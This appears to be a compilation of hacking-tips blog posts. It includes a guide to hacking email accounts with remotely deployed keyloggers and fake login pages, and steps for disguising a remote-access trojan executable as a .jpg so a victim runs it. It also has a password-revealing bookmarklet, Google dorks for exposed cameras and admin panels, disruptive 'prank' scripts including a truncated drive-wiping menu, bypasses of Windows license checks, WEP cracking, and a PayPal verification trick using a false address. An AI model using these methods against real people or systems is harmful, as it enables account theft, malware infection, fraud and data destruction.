Get Verifyed on PayPal Without Credit Card

Wonder How to do that ? just follow the steps below :

1. Make sure you have a PayPal account made. If you don't, go to www.paypal.com

2. Now go to Netspend and click the big green "Open Account" button.

3. Fill out the info, for the address put in anything, could be your real one doesn't matter. They will send a card to that address most people will throw it out as junk mail if its a fake address.

4. Log in to your PayPal account. Hit the "Get verified" link (image provided)



5. When the new page comes up, hit "Add Bank Account".

6. Log into your Netspend account. Go to "Add/Manage Money", then "PayPal Transfers".

7. Copy and paste the necessary info from the Netspend account to the PayPal Verification fields. Wait 3-5 days for the deposit.

8. Enjoy Spending!!

Applications Saved Password Location in Registry


               Many people ask about the location in the Registry or file system that applications store the passwords. Here is a list of password storage locations for popular applications compiled by Nir Sofer.
Be aware that even if you know the location of the saved password, it doesn t mean that you can move it from one computer to another. many applications store the passwords in a way that you prevent from moving them to another computer or user profile.

  • Internet Explorer 4.00 6.00: The passwords are stored in a secret location in the Registry known as the  Protected Storage .
    The base key of the Protected Storage is located under the following key:
     HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider .
    You can browse the above key in the Registry Editor (RegEdit), but you won t be able to watch the passwords, because they are encrypted.
    Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.
  • Internet Explorer 7.00   8.00: The new versions of Internet Explorer stores the passwords in 2 different locations.
    AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
    HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.
  • Firefox: The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
    These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
    Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.
  • Google Chrome Web browser: The passwords are stored in [Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data
    (This filename is SQLite database which contains encrypted passwords and other stuff)
  • Opera: The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile
  • Outlook Express (All Versions): The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.
  • Outlook 98/2000: Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.
  • Outlook 2002-2008: All new versions of Outlook store the passwords in the same Registry key of the account settings.
    The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]
    If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.
  • Windows Live Mail: All account settings, including the encrypted passwords, are stored in [Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[Account Name]
    The account filename is an xml file with .oeaccount extension.
  • ThunderBird: The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
    You should search a filename with .s extension.
  • Google Talk: All account settings, including the encrypted passwords, are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]
  • Google Desktop: Email passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name]
  • MSN/Windows Messenger version 6.x and below: The passwords are stored in one of the following locations:
    1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
    2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerServ ice
    3. In the Credentials file, with entry named as  Passport.Net\\* . (Only when the OS is XP or more)
  • MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\C reds\[Account Name]
  • Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with  WindowsLive:name= .
  • Yahoo Messenger 6.x: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
    ( EOptions string  value)
  • Yahoo Messenger 7.5 or later: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager    ETS  value.
    The value stored in  ETS  value cannot be recovered back to the original password.
  • AIM Pro: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\AIM\AIMPRO\[Account Name]
  • AIM 6.x: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords
  • ICQ Lite 4.x/5.x/2003: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners \[ICQ Number]
    (MainLocation value)
  • ICQ 6.x: The password hash is stored in [Windows Profile]\Application Data\ICQ\[User Name]\Owner.mdb (Access Database)
    (The password hash cannot be recovered back to the original password)
  • Digsby: The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
    All other passwords are stored in Digsby servers.
  • PaltalkScene: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name].


Bypass the Disabled Right Click option in Websites

                                 While browsing over the internet I have came across many sites disabling the right click feature on the website. The right click will be generally disabled to eradicate the copying of the content and for many other reasons.

The trick is that you can bypass this disable feature by changing the Security custom levels in your IE

Here is a step by step procedure.(Assuming that you use IE 7 for instance)

1. Open you Internet Explorer Browser

2. Click on "Tools"-> "Internet Options"

3. Click on the "Security" tab

4. Click "Custom Level"

5. Scroll down to the "Scripting" section

6. There set "Active Scripting" to "disable"

7. Then click "OK" on all the open boxes.

That's it. Now open the website and then now you don't have that disabling of the right click.

Once your work is done you need to enable it back again as many of the sites uses the java scripting and this need to be enabled to view those pages.

Reveals the Contents of Password Fields - JavaScript

Here is a Java Script which shows the password in the password field in plain text

Use to reveal passwords stored in browser password field

Open the webpage login screen
Eg:  www.gmail.com

If u had selected "Remember my Password" while logging in previously;  then you will see ur username and password field filled in automatically from your browser cookies.

The password field still shows asterisks(**********) which can be found through this javascript.  

just copy and paste the code below in the address bar and hit Enter

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j>F.length; ++j) { f = F[j]; for (i=0; i>f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

Change Processor Name and Number

Having system with old configuration?

Dont Worry. There's a way to change the Processor Name and Number.

GO TO START -->RUN

TYPE REGEDIT

HKEY_LOCAL_MACHINE --> HARDWARE --> --DESCRIPTION -->SYSTEM -->CENTRAL
PROCESSOR

On the right hand side right click on Processor Name and Select Modify.

Write whatever u want like QuadCore Q6600 .........

How to Block & Unblock USB Ports

Do you want to block any pen or Thumb drive from opening in your system's USB Port?

Let's Disable the USB Ports

FIRST OF ALL

GO TO --> START --> RUN

TYPE REGEDIT

LOOK FOR THE KEY :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR

FIND THE KEY THERE CALLED :-
"Start"

DOUBLE CLICK ON IT.

CHANGE THE VALUE DATA 3 --> 4

WHERE ITS BASE IS HEXADECIMAL

YOU HAVE DONE IT
NOW CLOSE THE REGISTRY AND YOU'LL SEE THE RESULT.
YOUR PC'S ALL USB PORTS ARE DISABLED

TO RE-ENABLE/UNBLOCK USB PORTS JUST CHANGE THE VALUE DATA AGAIN 4 --> 3
NOW YOUR PC'S ALL USB PORTS ARE RE-ENABLED.

Most Dangerous Scripts to Prank your Friends..

1) Convey your friend a little message and shut down his / her computer:
Type :



@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :



Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :




Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :




WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :




Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :
  Quote:



@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :


Quote:
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Google Search Hack Stuffs

1st Hack :-
Viewing Still Security Cameras Using Google :-

>> Open Google And Type :

inurl:"viewerframe?mode=motion"

In The Search Bar And Search,Open Any Results Shown To See Other's Security Cameras !!


2nd Hack :-
Viewing Motion Security Video Cameras Using Google :-

>> Open Google And Type :

intitle:"Live View / - AXIS"

In The Search Bar And Search,Open Any Results Shown To See Other's Online Video Cameras !!


3rd Hack :-
Unspidered Sites Using Google :-

>> Open Google And Tye :

"robots.txt" "disallow:" filetype:txt

In The Search Bar And Search,Open Any Results Shown To See Hidden WebPages !!


4th Hack :-
Frontpage User Info Using Google :-

>> Open Google And Tye :

inurl:_vti_pvt "service.pwd"

In The Search Bar And Search,Open Any Results Shown To See Other's Frontpage User Info !!


5th Hack :-
PHP Photo Album Hack Using Google :-

>> Open Google And Tye :

inurl:"phphotoalbum/upload"

In The Search Bar And Search,Open Any Results Shown To Upload/See/Download Other's Photo Album's !!


6th Hack :-
VNC User INFO Using Google :-

>> Open Google And Tye :

"vnc desktop"inurl:5800

In The Search Bar And Search,Open Any Results Shown To Make Bruteforce Attack To Access Other Computers !!


7th Hack :-
Accessing Printers Using Google :-

>> Open Google And Tye :

inurl:"port_255" -htm

In The Search Bar And Search,Open Any Results Shown To See/Configure Print Any Documents On Other Network Prnters !!


8th Hack :-
PHP Admin Account Hack Using Google :-

>> Open Google And Tye :

intitle:phpMyAdmin "Welcome to phpMyAdmin"***" "running on * as root@*"

In The Search Bar And Search,Open Any Results Shown To Go To Somebody's WebPage Admin Accounts !!

How to become a Google Bot?

You can become the famous google bot and surf the web unknown .. sneaking into private website.. although you can't access forum areas that are hidden or secret..

*note: This only works for Mozilla!

Here's how you do it~

Download the Add-on called "User Agent Switcher"

Next Install and restart you browser i.e Firefox

Next go to Tools>>User agent switcher>> options>>options

Next click the user agent(below general on left side) and click add
type description as "Google Bot"
then user agent as "Googlebot/2.1+(+http://www.google.com/bot.html)"
and application name again as Google bot
version as 2.1
leave the rest rows blank

click ok twice

and again go to tools >> user agent swithcher >> and click on google bot !

Your good to go dude

How to Hack an Email Account

         The most frequent question asked by many people especially in a chat room is How to Hack an Email Account? So you as the reader are most likely reading this because you want to hack into some one’s email account. Most of the sites on the internet teach you some nonsense and outdated tricks to hack email. But here are some of the real and working ways that can be used to hack an email account.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

Before you learn the real ways to hack email, the following are the things you should be aware of.

1. There is no ready made software that can hack emails just with a click of a button. Please don’t waste your money on such scam softwares.
2. Never trust any email hacking services that claims to hack emails just for $100 or $200. Often people get fooled by these services and eventually loose their money with no gain.
3. With my experience of over 6 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods to hack an email. All the other methods are simply scam or don’t work. The following are the only 2 foolproof methods that work.

1. EASIEST WAY TO HACK AN EMAIL ACCOUNT


Today, with the advent of a program called Keylogger it’s just a cakewalk to hack any email account. Using a keylogger is the easiest way to hack an email account. Any one with a basic knowledge of computer can use the keylogger and within few hours you can hack any email account.

1. What is a keylogger?
A keylogger is a small program that monitors each keystroke a user types on a specific computer’s keyboard. Using a keylogger is the easiest way to hack an email account. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.

2. Where is the keylogger program available?
A keylogger program is widely available on the internet. Some of the best ones are listed below
SniperSpy
Win-Spy

3. How to install it?
You can install these keyloggers just as any other program. Installation is just a child’s play!

4. Once installed how to get password from it?
Once installed the keylogger starts recording every activity on the target computer. These logs are sent to you by the keylogger software via email or FTP. These logs contain the password of the victim’s email account.

5. I don’t have physical access to the victim’s target computer, what can I do?
It doesn’t matter whether or not you have physical access to the victim’s computer. Because keyloggers like SniperSpy and Win-Spy offers Remote Installation Feature. With this feature it is possible to remotely install the keylogger on the victim’s PC.

6. What is the best way to deploy the keylogger onto remote PC?
Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.
NOTE: WHILE USING A KEYLOGGER TO HACK AN EMAIL ACCOUNT IT IS HIGHLY RECOMMENDED THAT YOU HIDE YOUR REAL IP ADDRESS. SO WE RECOMMEND THE FOLLOWING IP HIDING SOFTWARE
Hide the IP
Hide the IP provides an option to frequently change your country location so that you never reveal your real IP. However to avail this facility you need to purchase the software since this feature is not available in the trial version.

7. Which Keylogger is the best?

I recommend SniperSpy as the best for the following reasons.
1. SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista. But Winspy has known compatible issues with Vista. So if your PC or the remote PC runs Vista then Winspy is not recommended.
2. SniperSpy is more reliable than Win-Spy since the logs sent will be received and hosted by SniperSpy servers. You need not rely on your email account to receive the logs.
3. SniperSpy is more easy to use and faster than Winspy.
4. SniperSpy offers better support than WinSpy.

Apart from the above mentioned reasons, both SniperSpy and WinSpy stands head-to-head. However in my opinion it’s better to go for SniperSpy since it is the best one. If you’re serious to hack an email account then go grab either of the two keyloggers now!

2. OTHER WAYS TO HACK AN EMAIL ACCOUNT


The other most commonly used trick to hack an email is by using Fake Login Pages. Today, Fake login pages are the most widely used techniques to hack an email account. A Fake Login page is a page that appears exactly as a Login page but once we enter our password there, we end up loosing it.
Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we loose our valuable data.
However creating a fake login page and taking it online to successfully hack an email account is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc.
I hope this info has helped you. Happy Email Hacking!

Change Windows XP Boot Screen

Be Careful : Not my post but u can give a try

                        Search for Free Transformation Pack in Net else u can get it free in DVDs along with CHIP, DIGIT, or PC WORLD etc... Magazines.
                         The Microsoft Release Candidate is already out and free to download. But still if you are one of those XP lovers like me who can’t stop using XP then you can try the Windows 7 kinda look for your XP. By using which even a newbie can get the complete Windows 7 look without doing any extra work. It is as simple as installing a new software on your PC


Windows 7 trasformation pack

Windows 7 trasformation pack
With Windows 7 remix you can make your XP look like Windows 7 in just few clicks. It supports Windows XP, Windows 2003, Windows Media Center Edition and some other flavors of XP.
Languages:
  • Spanish
  • English
Will work with only 32 bit edition of Windows.

Download Windows 7 Remix(31 MB)

How are Intruders Using Sniffers?

               When used by malicious individuals, sniffers can represent a significant threat to the security of your network. Network intruders often use network sniffing to capture valuable, confidential information. The terms sniffing and eavesdropping have often been associated with this practice. However, sniffing is now becoming a non-negative term and most people use the terms sniffing and network analysis interchangeably.
          Using a sniffer in an illegitimate way is considered a passive attack. It does not directly interface or connect to any other systems on the network. However, the computer that the sniffer is installed on could have been compromised using an active attack. The passive nature of sniffers is what makes detecting them so difficult. 

We will discuss the methods used to detect sniffers later in this chapter.
The following list describes a few reasons why intruders are using sniffers on the network:
  • Capturing clear-text usernames and passwords
  • Compromising proprietary information
  • Capturing and replaying Voice over IP telephone conversations
  • Mapping a network
  • Passive OS fingerprinting
Obviously, these are illegal uses of a sniffer, unless you are a penetration tester whose job it is to find these types of weaknesses and report them to an organization.

For sniffing to occur, an intruder must first gain access to the communication cable of the systems that are of interest. This means being on the same shared network segment, or tapping into the cable somewhere between the path of communications. If the intruder is not physically present at the target system or communications access point, there are still ways to sniff network traffic. These include:
  • Breaking into a target computer and installing remotely controlled sniffing software.
  • Breaking into a communications access point, such as an Internet Service Provider (ISP) and installing sniffing software.
  • Locating/finding a system at the ISP that already has sniffing software installed.
  • Using social engineering to gain physical access at an ISP to install a packet sniffer.
  • Having an insider accomplice at the target computer organization or the ISP install the sniffer.
  • Redirecting communications to take a path that includes the intruder’s computer.
Sniffing programs are included with most rootkits that are typically installed on compromised systems. Rootkits are used to cover the tracks of the intruder by replacing commands and utilities and clearing log entries. They also install other programs such as sniffers, key loggers, and backdoor access software. Windows sniffing can be accomplished as part of some RAT (Remote Admin Trojan) such as SubSeven or Back Orifice. Often intruders will use sniffing programs that are configured to detect specific things, such as passwords, and then electronically send them to the intruder (or store them for later retrieval by the intruder). Vulnerable protocols for this type of activity include telnet, FTP, POP3, IMAP, SMTP, HTTP, rlogin, and SNMP.
One example of a rootkit is T0rnKit, which works on Solaris and Linux. The sniffer that is included with this rootkit is called t0rns and is installed in the hidden directory /usr/srec/.puta. Another example of a rootkit is Lrk5 (Linux Rootkit 5), which installs with the linsniff sniffer.
Intruders commonly use sniffer programs to control back doors. One method is to install a sniffer on a target system that listens for specific information. Then, backdoor control information can be sent to a neighboring system. The sniffer picks this up, and acts appropriately on the target computer. This type of backdoor control is often hard for investigators to detect, since it looks like the innocent neighbor system is the compromised target. cd00r is an example of a backdoor sniffer that operates in non-promiscuous mode, making it even harder to detect. Using a product like Nmap to send a series of Transmission Control Protocol (TCP) SYN packets to several predefined ports will trigger the backdoor to open up on a pre-configured port. More information about Cdoor can be found at www.phenoelit.de/stuff/cd00r.c.
 

   Note 
A rootkit is a collection of trojan programs that are used to replace the real programs on a compromised system in order to avoid detection. Some common commands that get replaced are ps, ifconfig, and ls. Rootkits also install additional software such as sniffers.

   
Note 
Nmap is a network scanning tool used for network discovery and auditing. It can send raw IP packets to destination ports on target systems.

What is Network Analysis and Sniffing?

                  Network analysis is the process of capturing network traffic and inspecting it closely to determine what is happening on the network. A network analyzer decodes, or dissects, the data packets of common protocols and displays the network traffic in human-readable format. Network analysis is also known by several other names: traffic analysis, protocol analysis, sniffing, packet analysis, and eavesdropping to name a few. Sniffing tends to be one of the most popular terms in use today. However, as you will see later in this chapter, due to malicious users it has had a negative connotation in the past.

                   A network analyzer can be a standalone hardware device with specialized software, or it can simply be software that you install on your desktop or laptop computer. Network analyzers are available both free and commercially. Differences between network analyzers tend to depend on features such as the number of supported protocol decodes, the user interface, and graphing and statistical capabilities. Other differences include inference capabilities, such as expert analysis features, and the quality of packet decodes. Although several network analyzers all decode the same protocols, some may decode better than others.

         A network analyzer is a combination of hardware and software. Although there are differences in each product, a network analyzer is composed of five basic parts:
  • Hardware Most network analyzers are software-based and work with standard operating systems (OSs) and network interface cards (NICs). However, there are some special hardware network analyzers that offer additional benefits such as analyzing hardware faults including: Cyclic Redundancy Check (CRC) errors, voltage problems, cable problems, jitter, jabber, negotiation errors, etc. Some network analyzers only support Ethernet or wireless adapters, while others support multiple adapters and allow users to customize their configuration. Sometimes you will also need a hub or a cable tap to connect to the existing cable.


  • Capture driver This is the part of a network analyzer that is responsible for actually capturing the raw network traffic from the cable. It will also filter out the traffic that you want and store the data in a buffer. This is the core of a network analyzer and you cannot capture data without it.


  • Buffer This component stores the captured data. Data can be stored in a buffer until it is full, or in a rotation method such as “round robin” where the newest data replaces the oldest data. Buffers can be disk-based or memory-based.


  • Real-time analysis This feature analyzes the data as it comes off the cable. Some network analyzers use this to find network performance issues, and network intrusion detection systems do this to look for signs of intruder activity.


  • Decode This component displays the contents of the network traffic with descriptions so that it is human-readable. Decodes are specific to each protocol, so network analyzers tend to vary in the number of decodes they currently support. However, new decodes are constantly being added to network analyzers.

Solution for "Non-Genuine Windows" Problem in XP

1. Go to Start --> Run, 
         key in this code:
         %windir%\system32\wgatray.exe /u

2. Again, go to Start --> Run, 

         Type
         regedit

3. Follow the path given below and look for this Folder(WgaLogon) :
         HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon

4. Delete the 'WgaLogon' folder

5. Restart your computer

6. Done

How to Crack WEP key (Video)

This is a Video Tutorial about How to crack WEP key of a Wireless Network.
Download Size: 6 MB
Type: Ultra Compressed Video

The Video's Quality is very good and i'm sure you can figure it out. Tools etc used in the tutorial can be googled.

http://rapidshare.com/files/152772507/DETAILED_VIDEO_HOW_TO_CRACK_WEP_KEy.flv

Change MAC address of ur Computer

First let me explain a few things about MAC addresses.
MAC stands for Media Access Control and in a sense the MAC address is a computer’s true name on a LAN. An Ethernet MAC address is a six byte number, usually expressed as a twelve digit hexadecimal number (Example: 1AB4C234AB1F).

IPs are translated to MAC address by a protocol called ARP (Address Resolution Protocol). Let’s say a computer with and IP of 192.168.1.1 wants to send information to another computer on the LAN that has an IP of 192.168.1.2 . First 192.168.1.1 will send out a broadcast to all stations on the LAN asking who has the IP 192.168.1.2. Then the box that has 192.168.1.2 will respond to 192.168.1.1 with it’s MAC address which is cached in 192.168.1.1’s ARP table for later use.

You can see the ARP table of a box by dropping out to a command prompt and typing “arp –a” in Windows or just “arp” in Linux. ARP can also work the other way by a host on the LAN sending its MAC address to another machine on the LAN for preemptive caching unless the host is configured to not accept un-requested ARP replies.

A person might want to change the MAC address of a NIC for one of many reasons:

To get past MAC address filtering on a router. Valid MAC addresses can be found by sniffing them and then the deviant user could assume the MAC of a valid host. This can cause some network stability problem.
Sniffing other connections on the network.
So as to keep their burned in MAC address out of IDS and security logs, thus keeping deviant behavior from being connected to their hardware.
To pull off a denial of service attack, for instance assuming the MAC of the gateway to a sub net might cause traffic problems.

Linux
To change your MAC address in Linux (and most *nix system) is easy as pie. All it takes is two easy to script commands:

ifconfig eth0 down hw ether 00:00:00:00:00:01

ifconfig eth0 up

These two little commands would set you eth0 interface to use the MAC 00:00:00:00:00:01. Just plug in the NIC you want to set and the MAC address you want to use into the commands above and your done. Changing your MAC address is one of those things that is much easier to do in Linux then under Windows.

Windows: The Hard Way

In XP you can use the regedit to edit the registry from a GUI or the reg command to edit it from the console, I’ll be using regedit. Information on all your NICs can be found the registry key

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\ .
Under this key you will find a bunch of sub keys labeled as 0000, 00001, 0002 and so forth. We can assume any MAC address we want by finding the key that controls the NIC we want to change, putting in a string value called “NetworkAddress” and setting it to the MAC address we want to use formatted as a twelve digit hex number (example: 000000000001).
To find out which key is which we can search through them for the value “DriverDesc” until we find the one that matches the NIC we wish to alter. After you set “NetworkAddress” to the address you want just restart the NIC by disabling it then enabling it (or in the case of PCMCIA cards, just eject and reinsert). You can confirm the MAC address change by using the “getmac” or “ipconfig /all” commands.

Windows: The Easy Way

Use Smac (
Code:

http://www.klcconsulting.net/smac/

) or Etherchange (
Code:

http://ntsecurity.nu/toolbox/etherchange/

). Smac has a nice GUI and was free but has since gone commercial. Since GUIs are for wimps and I’m cheap I use Arne Vidstrom Etherchange. Etherchange is completely free and easy to use, just walk though the interactive dialog, restart your NIC and your done.

BSD

1) Bring down the interface: "ifconfig xl0 down"

2) Enter new MAC address: "ifconfig xl0 link 00:00:00:AA:AA:AA"

3) Bring up the interface: "ifconfig xl0 up"



Linux

1) Bring down the interface: "ifconfig eth0 down"

2) Enter new MAC address: "ifconfig eth0 hw ether 00:00:00:AA:AA:AA"

3) Bring up the interface: "ifconfig eth0 up"



Windows 2000/XP

Method 1:

This is depending on the type of Network Interface Card (NIC) you have. If you have a card that doesn’t support Clone MAC address, then you have to go to second method.

a) Go to Start->Settings->Control Panel and double click on Network and Dial-up Connections.

b) Right click on the NIC you want to change the MAC address and click on properties.

c) Under "General" tab, click on the "Configure" button

d) Click on "Advanced" tab

e) Under "Property section", you should see an item called "Network Address" or "Locally Administered Address", click on it.

f) On the right side, under "Value", type in the New MAC address you want to assign to your NIC. Usually this value is entered without the "-" between the MAC address numbers.

g) Goto command prompt and type in "ipconfig /all" or "net config rdr" to verify the changes. If the changes are not materialized, then use the second method.

h) If successful, reboot your system.


Method 2:

This should work on all Windows 2000/XP systems

a) Go to Start -> Run, type "regedt32" to start registry editor. Do not use "Regedit".

b) Go to "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}". Double click on it to expand the tree. The subkeys are 4-digit numbers, which represent particular network adapters. You should see it starts with 0000, then 0001, 0002, 0003 and so on.

c) Find the interface you want by searching for the proper "DriverDesc" key.

d) Edit, or add, the string key "NetworkAddress" (has the data type "REG_SZ") to contain the new MAC address.

e) Disable then re-enable the network interface that you changed (or reboot the system).


Method 3:

Use the program Etherchange from
Code:

http://ntsecurity.nu/toolbox/etherchange/

Please, take a reg backup before u go in for regedit.

Converting .exe files to .jpg

1. Firstly, create a new folder and make sure that the options 'show hidden files' is checked and ‘hide extensions for known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on your pc.

2. Paste a copy of your server on the new created folder. let's say it's called server.exe
(that's why you need the extension of files showing, cause you need to see it to change it)

3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg

4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5. Now create a shortcut of this picture.jpeg in the same folder.

6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.

7. Go to properties (on file me.jpeg) and now you need to do some changes there.

8. First of all delete all the text on field START IN and leave it empty.

9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg

10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?

11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the
server will run.

12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.

13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection from someone.

14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected
to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want
considering the person and the knowledge they have on this matter.

15. For me for example I always want the shortcut showing first so can be the first file to be opened.
So I rename the server to picture2.jpeg and the shortcut to picture 1.jpeg. This way the shortcut will show up first.
If you set hidden properties to the server (picture.jpeg) then u don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a zip file or rar.

16. So the best way to send these files together to someone is compress them into zip or rar.

17. inside the RAR or ZIP file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Brand windows with your name

open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
***********************************************
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
************************************************
1. Save the file as OEMINFO.INI in the c:\windows\system32.
2. Then make a right click on my computer select properties, in the general tab see suppport information........

How to get Clipboard Data

var content = clipboardData.getData("Text");
alert(content);